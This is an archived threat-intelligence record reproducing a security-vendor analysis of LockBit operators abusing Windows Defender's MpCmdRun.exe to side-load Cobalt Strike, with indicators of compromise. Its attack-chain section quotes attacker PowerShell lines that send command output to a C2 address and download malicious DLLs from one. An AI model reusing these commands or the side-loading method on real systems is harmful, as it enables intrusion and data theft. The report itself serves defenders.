{ "id": "d14f0cb9-1ebe-450c-bd6a-73534fdd63c4", "created_at": "2026-04-06T00:07:03.761649Z", "updated_at": "2026-04-10T03:24:23.903622Z", "deleted_at": null, "sha1_hash": "f27328c6b8b1e2c8c83bc8a330c2b583439d845e", "title": "Living Off Windows Defender | LockBit Ransomware Sideloads Cobalt Strike Through Microsoft Security Tool", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1485385, "plain_text": "Living Off Windows Defender | LockBit Ransomware Sideloads\r\nCobalt Strike Through Microsoft Security Tool\r\nBy Julio Dantas, James Haughom \u0026 Julien Reisdorffer\r\nPublished: 2022-07-28 · Archived: 2026-04-05 16:00:53 UTC\r\nLockBit has been receiving a fair share of attention recently. Last week, SentinelLabs reported on LockBit 3.0\r\n(aka LockBit Black), describing how the latest iteration of this increasingly prevalent RaaS implemented a series\r\nof anti-analysis and anti-debugging routines. Our research was quickly followed up by others reporting similar\r\nfindings. Meanwhile, back in April, SentinelLabs reported on how a LockBit affiliate was leveraging the\r\nlegitimate VMware command line utility, VMwareXferlogs.exe , in a live engagement to side load Cobalt Strike.\r\nIn this post, we follow up on that incident by describing the use of another legitimate tool used to similar effect by\r\na LockBit operator or affiliate, only this time the tool in question turns out to belong to a security tool: Windows\r\nDefender. During a recent investigation, we found that threat actors were abusing the Windows Defender\r\ncommand line tool MpCmdRun.exe to decrypt and load Cobalt Strike payloads.\r\nOverview\r\nThe initial target compromise happened via the Log4j vulnerability against an unpatched VMWare Horizon\r\nServer. The attackers modified the Blast Secure Gateway component of the application installing a web shell using\r\nPowerShell code found documented here.\r\nOnce initial access had been achieved, the threat actors performed a series of enumeration commands and\r\nattempted to run multiple post-exploitation tools, including Meterpreter, PowerShell Empire and a new way to\r\nhttps://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/\r\nPage 1 of 5\n\nside-load Cobalt Strike.\r\nIn particular, when attempting to execute Cobalt Strike we observed a new legitimate tool used for side-loading a\r\nmalicious DLL, that decrypts the payload.\r\nPreviously observed techniques to evade defenses by removing EDR/EPP’s userland hooks, Event Tracing for\r\nWindows and Antimalware Scan Interface were also observed.\r\nAttack Chain\r\nOnce the attackers gained initial access via the Log4j vulnerability, reconnaissance began using PowerShell to\r\nexecute commands and exfiltrate the command output via a POST base64 encoded request to an IP. Examples of\r\nthe reconnaissance activity can be seen below:\r\npowershell -c curl -uri http://139.180.184[.]147:80 -met POST -Body ([System.Convert]::ToBase64String\r\nOnce the threat actor acquired sufficient privileges, they attempted to download and execute multiple post-exploitation payloads.\r\nhttps://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/\r\nPage 2 of 5\n\nThe threat actor downloads a malicious DLL, the encrypted payload and the legitimate tool from their controlled\r\nC2:\r\npowershell -c Invoke-WebRequest -uri http://45.32.108[.]54:443/mpclient.dll -OutFile c:\\windows\\help\\\r\nNotably, the threat actor leverages the legitimate Windows Defender command line tool MpCmdRun.exe to decrypt\r\nand load Cobalt Strike payloads.\r\nWe also note the correlation between the IP address used to download the Cobalt Strike payload and the IP address\r\nused to perform reconnaissance: shortly after downloading Cobalt Strike the threat actor tried to execute and send\r\nthe output to the IP starting with 139, as can be seen in both snippets below.\r\npowershell -c Invoke-WebRequest -uri http://45.32.108[.]54:443/glib-2.0.dll -OutFile c:\\users\\public\\\r\npowershell -c curl -uri http://139.180.184[.]147:80 -met POST -Body ([System.Convert]::ToBase64String\r\nhttps://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/\r\nPage 3 of 5\n\nFollowing the same flow as the sideloading of the VMwareXferlogs.exe utility reported on previously,\r\nMpCmd.exe is abused to side-load a weaponized mpclient.dll , which loads and decrypts Cobalt Strike Beacon\r\nfrom the c0000015.log file.\r\nAs such, the components used in the attack specifically related to the use of the Windows Defender command line\r\ntool are:\r\nFilename Description\r\nmpclient.dll Weaponized DLL loaded by MpCmdRun.exe\r\nMpCmdRun.exe Legitimate/signed Microsoft Defender utility\r\nC0000015.log Encrypted Cobalt Strike payload\r\nConclusion\r\nDefenders need to be alert to the fact that LockBit ransomware operators and affiliates are exploring and\r\nexploiting novel “living off the land” tools to aid them in loading Cobalt Strike beacons and evading some\r\ncommon EDR and traditional AV detection tools.\r\nImportantly, tools that should receive careful scrutiny are any that either the organization or the organization’s\r\nsecurity software have made exceptions for. Products like VMware and Windows Defender have a high\r\nprevalence in the enterprise and a high utility to threat actors if they are allowed to operate outside of the installed\r\nsecurity controls.\r\nIndicators of Compromise\r\nIoC Description\r\na512215a000d1b21f92dbef5d8d57a420197d262 Malicious glib-2.0.dll\r\n729eb505c36c08860c4408db7be85d707bdcbf1b Malicious glib-2.0.dll\r\n10039d5e5ee5710a067c58e76cd8200451e54b55 Malicious glib-2.0.dll\r\nff01473073c5460d1e544f5b17cd25dadf9da513 Malicious glib-2.0.dll\r\ne35a702db47cb11337f523933acd3bce2f60346d Encrypted Cobalt Strike payload – c0000015.log\r\n82bd4273fa76f20d51ca514e1070a3369a89313b Encrypted Cobalt Strike payload – c0000015.log\r\n091b490500b5f827cc8cde41c9a7f68174d11302 Decrypted Cobalt Strike payload – c0000015.log\r\n0815277e12d206c5bbb18fd1ade99bf225ede5db Encrypted Cobalt Strike payload – c0000013.log\r\need31d16d3673199b34b48fb74278df8ec15ae33 Malicious mpclient.dll\r\nhttps://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/\r\nPage 4 of 5\n\n149.28.137[.]7 Cobalt Strike C2\r\n45.32.108[.]54\r\nIP where the attacker staged the malicious payloads to be\r\ndownloaded\r\n139.180.184[.]147\r\nAttacker C2 used to receive data from executed\r\ncommands\r\ninfo.openjdklab[.]xyz Domain used by the mpclient.dll\r\nSource: https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-securit\r\ny-tool/\r\nhttps://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/\r\nPage 5 of 5", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "references": [ "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/" ], "report_names": [ "living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool" ], "threat_actors": [ { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434023, "ts_updated_at": 1775791463, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/f27328c6b8b1e2c8c83bc8a330c2b583439d845e.pdf", "text": "https://archive.orkl.eu/f27328c6b8b1e2c8c83bc8a330c2b583439d845e.txt", "img": "https://archive.orkl.eu/f27328c6b8b1e2c8c83bc8a330c2b583439d845e.jpg" } }